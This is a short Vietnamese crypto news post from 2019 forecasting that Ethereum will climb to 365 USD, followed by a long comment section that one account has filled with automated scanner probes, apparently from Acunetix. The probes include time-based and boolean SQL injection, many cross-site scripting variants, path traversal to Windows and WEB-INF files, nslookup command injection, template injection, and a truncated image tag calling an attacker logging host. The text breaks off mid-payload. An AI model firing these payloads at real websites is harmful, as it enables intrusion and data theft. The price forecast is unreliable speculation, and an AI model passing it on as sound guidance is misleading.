Giá ETH đang hướng tới 365 USD

31/05/2019 - huy
1463
201

 

Quá nhiều trader cảm thấy không tin tưởng vào ETH, một số thậm chí còn bi quan đến nỗi tin rằng tiền điện tử sẽ giảm xuống dưới 100 USD.

 

Họ không nhận ra rằng Ethereum đã đảo ngược xu hướng của nó trong dài hạn. Trong tuần thứ hai của tháng 5, thị trường đã phá vỡ mô hình đáy tròn với khối lượng đáng kể sau khi lấy lại thành công mức kháng cự 200 USD. Đà đột phá này đã chấm dứt thị trường gấu kéo dài 16 tháng của Ethereum.

 

Trong tuần tới hoặc những tuần tiếp sau, chúng tôi hy vọng ethereum sẽ pullback và test lại mức 200 USD dưới dạng vùng hỗ trợ. Sau khi pullback, chúng ta có thể thấy thị trường leo lên tới 365 USD trong vòng một tháng.
 
 
Theo Blogtienao
Leave your comment
Comments
rwejbolu
rwejbolu
30/08/2019 14:21

1

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

fexWnnWc

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

set|set&set

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

response.write(9005621*9148439)

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

'+response.write(9005621*9148439)+'

rwejbolu
rwejbolu
30/08/2019 15:34

"+response.write(9005621*9148439)+"

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

${10000064+10000042}

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

12345'"\'\");|]*{
<>�''💩

rwejbolu
rwejbolu
30/08/2019 15:34

$(nslookup 9PB84FGs)

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

&nslookup dCPyE2gq&'\"`0&nslookup dCPyE2gq&`'

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

1

rwejbolu
rwejbolu
30/08/2019 15:34

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

rwejbolu
rwejbolu
30/08/2019 15:34

1some_inexistent_file_with_long_name.jpg

rwejbolu
rwejbolu
30/08/2019 15:34

Http://testasp.vulnweb.com/t/fit.txt

rwejbolu
rwejbolu
30/08/2019 15:34

http://testasp.vulnweb.com/t/fit.txt?.jpg

rwejbolu
rwejbolu
30/08/2019 15:35

testasp.vulnweb.com

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

'"()

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1&n992849=v947948

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

http://testasp.vulnweb.com/t/xss.html?%00.jpg

rwejbolu
rwejbolu
30/08/2019 15:35

;print(md5(acunetix_wvs_security_test));

rwejbolu
rwejbolu
30/08/2019 15:35

';print(md5(acunetix_wvs_security_test));$a='

rwejbolu
rwejbolu
30/08/2019 15:35

";print(md5(acunetix_wvs_security_test));$a="

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

${@print(md5(acunetix_wvs_security_test))}

rwejbolu
rwejbolu
30/08/2019 15:35

http://hiteTrocmmCPa.bxss.me/

rwejbolu
rwejbolu
30/08/2019 15:35

${@print(md5(acunetix_wvs_security_test))}\

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

)

rwejbolu
rwejbolu
30/08/2019 15:35

!(()&&!|*|*|

rwejbolu
rwejbolu
30/08/2019 15:35

^(#$!@#$)(()))******

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

gia-eth-dang-huong-toi-365-usd.html

rwejbolu
rwejbolu
30/08/2019 15:35

gia-eth-dang-huong-toi-365-usd.html

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

gia-eth-dang-huong-toi-365-usd.html/.

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

/www.vulnweb.com

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1'"

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

\

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1����%2527%2522

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

@@4DZrH

rwejbolu
rwejbolu
30/08/2019 15:35

'"

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

<!--

rwejbolu
rwejbolu
30/08/2019 15:35

../../../../../../../../../../windows/win.ini

rwejbolu
rwejbolu
30/08/2019 15:35

1'"()&%<acx><ScRiPt >ACPQ(9968)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:35

'"()&%<acx><ScRiPt >ACPQ(9940)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:35

C:\WINDOWS\system32\drivers\etc\hosts

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

JyI=

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

19576720

rwejbolu
rwejbolu
30/08/2019 15:35

�'�"

rwejbolu
rwejbolu
30/08/2019 15:35

acu7682<s1﹥s2ʺs3ʹuca7682

rwejbolu
rwejbolu
30/08/2019 15:35

../../../../../../../../../../windows/win.ini.jpg

rwejbolu
rwejbolu
30/08/2019 15:35

�''�""

rwejbolu
rwejbolu
30/08/2019 15:35

������������������������������������������������windows��win.ini

rwejbolu
rwejbolu
30/08/2019 15:35

................windowswin.ini

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

..\..\..\..\..\..\..\..\windows\win.ini

rwejbolu
rwejbolu
30/08/2019 15:35

1

rwejbolu
rwejbolu
30/08/2019 15:35

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

rwejbolu
rwejbolu
30/08/2019 15:35

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

rwejbolu
rwejbolu
30/08/2019 15:35

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

rwejbolu
rwejbolu
30/08/2019 15:35

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

rwejbolu
rwejbolu
30/08/2019 15:35

WEB-INF/web.xml

rwejbolu
rwejbolu
30/08/2019 15:36

WEB-INF\web.xml

rwejbolu
rwejbolu
30/08/2019 15:36

1

rwejbolu
rwejbolu
30/08/2019 15:36

1

rwejbolu
rwejbolu
30/08/2019 15:36

acux2711��z1��z2a�bcxuca2711

rwejbolu
rwejbolu
30/08/2019 15:36

1

rwejbolu
rwejbolu
30/08/2019 15:36

1

rwejbolu
rwejbolu
30/08/2019 15:36

1

rwejbolu
rwejbolu
30/08/2019 15:36

1

rwejbolu
rwejbolu
30/08/2019 15:36

90kNY73g

rwejbolu
rwejbolu
30/08/2019 15:36

-1 OR 2+42-42-1=0+0+0+1 --

rwejbolu
rwejbolu
30/08/2019 15:36

CWS000x�=�1N�@E߮��I)�@��  �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0

rwejbolu
rwejbolu
30/08/2019 15:36

{{9999667*9999763}}

rwejbolu
rwejbolu
30/08/2019 15:36

1<ScRiPt >ACPQ(9706)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:36

-1 OR 2+76-76-1=0+0+0+1

rwejbolu
rwejbolu
30/08/2019 15:36

1<WYJVPM>PIAHJ[!+!]</WYJVPM>

rwejbolu
rwejbolu
30/08/2019 15:36

-1' OR 2+159-159-1=0+0+0+1 --

rwejbolu
rwejbolu
30/08/2019 15:36

1<script>ACPQ(9340)</script>

rwejbolu
rwejbolu
30/08/2019 15:36

-1' OR 2+87-87-1=0+0+0+1 or 'rLzoQppa'='

rwejbolu
rwejbolu
30/08/2019 15:36

1<ScR<ScRiPt>IpT>ACPQ(9428)</sCr<ScRiPt>IpT>

rwejbolu
rwejbolu
30/08/2019 15:36

-1" OR 2+154-154-1=0+0+0+1 --

rwejbolu
rwejbolu
30/08/2019 15:36

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

rwejbolu
rwejbolu
30/08/2019 15:36

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

rwejbolu
rwejbolu
30/08/2019 15:36

-1; waitfor delay '0:0:3' --

rwejbolu
rwejbolu
30/08/2019 15:36

1<ScRiPt
>ACPQ(9315)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:36

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9219></ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:36

-1); waitfor delay '0:0:3' --

rwejbolu
rwejbolu
30/08/2019 15:36

1<ScRiPt
>ACPQ(9195)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:36

1<video><source onerror="javascript:ACPQ(9343)">

rwejbolu
rwejbolu
30/08/2019 15:36

1<svg  

�onload=ACPQ(9054);>

rwejbolu
rwejbolu
30/08/2019 15:36

-1); waitfor delay '0:0:6' --

rwejbolu
rwejbolu
30/08/2019 15:36

-1)); waitfor delay '0:0:6' --

rwejbolu
rwejbolu
30/08/2019 15:36

1<isindex type=image src=1 onerror=ACPQ(9307)>

rwejbolu
rwejbolu
30/08/2019 15:36

1 waitfor delay '0:0:6' --

rwejbolu
rwejbolu
30/08/2019 15:36

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9141'>

rwejbolu
rwejbolu
30/08/2019 15:36

1<body onload=ACPQ(9281)>

rwejbolu
rwejbolu
30/08/2019 15:36

1<img src=//testasp.vulnweb.com/t/dot.gif onload=ACPQ(9193)>

rwejbolu
rwejbolu
30/08/2019 15:36

1<img src=xyz OnErRor=ACPQ(9623)>

rwejbolu
rwejbolu
30/08/2019 15:36

Wbrc8Dzm'; waitfor delay '0:0:6' --

rwejbolu
rwejbolu
30/08/2019 15:36

O8N6ksUL'); waitfor delay '0:0:9' --

rwejbolu
rwejbolu
30/08/2019 15:36

OvnSqe0g')); waitfor delay '0:0:9' --

rwejbolu
rwejbolu
30/08/2019 15:36

1<img/src=">" onerror=alert(9080)>

rwejbolu
rwejbolu
30/08/2019 15:36

%31%3C%53%63%52%69%50%74%20%3E%41%43%50%51%289737%29%3C%2F%73%43%72%69%70%54%3E

rwejbolu
rwejbolu
30/08/2019 15:36

-1;select pg_sleep(9); --

rwejbolu
rwejbolu
30/08/2019 15:36

-1);select pg_sleep(3); --

rwejbolu
rwejbolu
30/08/2019 15:36

-1));select pg_sleep(3); --

rwejbolu
rwejbolu
30/08/2019 15:36

2D6TRq5W';select pg_sleep(3); --

rwejbolu
rwejbolu
30/08/2019 15:36

dRQHihdU');select pg_sleep(3); --

rwejbolu
rwejbolu
30/08/2019 15:36

3of7E6Lr'));select pg_sleep(6); --

rwejbolu
rwejbolu
30/08/2019 15:36

645'

rwejbolu
rwejbolu
30/08/2019 15:36

1

rwejbolu
rwejbolu
30/08/2019 15:36

1

rwejbolu
rwejbolu
30/08/2019 15:36

1\u003CScRiPt\ACPQ(9069)\u003C/sCripT\u003E

rwejbolu
rwejbolu
30/08/2019 15:37

1&lt;ScRiPt&gt;ACPQ(9181)&lt;/sCripT&gt;

rwejbolu
rwejbolu
30/08/2019 15:37

�<img acu onmouseover=ACPQ(9803) //�>

rwejbolu
rwejbolu
30/08/2019 15:37

1<input autofocus onfocus=ACPQ(9854)>

rwejbolu
rwejbolu
30/08/2019 15:37

<a HrEF=http://www.vulnweb.com></a>

rwejbolu
rwejbolu
30/08/2019 15:37

<a HrEF=jaVaScRiPT:>

rwejbolu
rwejbolu
30/08/2019 15:37

[url=http://www.vulnweb.com][/url]

rwejbolu
rwejbolu
30/08/2019 15:37

1<img<!-- --> src=x onerror=alert(9442);//><!-- -->

rwejbolu
rwejbolu
30/08/2019 15:37

1}body{acu:Expre/**/SSion(ACPQ(9217))}

rwejbolu
rwejbolu
30/08/2019 15:37

1<% contenteditable onresize=ACPQ(9052)>

rwejbolu
rwejbolu
30/08/2019 15:37

12ABQk
<ScRiPt >ACPQ(9472)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:37

1<WL3DMR>2RV3E[!+!]</WL3DMR>

rwejbolu
rwejbolu
30/08/2019 15:37

1<ifRAme sRc=9917.com></IfRamE>

rwejbolu
rwejbolu
30/08/2019 15:37

1<2beMNT x=9397>

rwejbolu
rwejbolu
30/08/2019 15:37

1<img sRc='http://attacker-9921/log.php?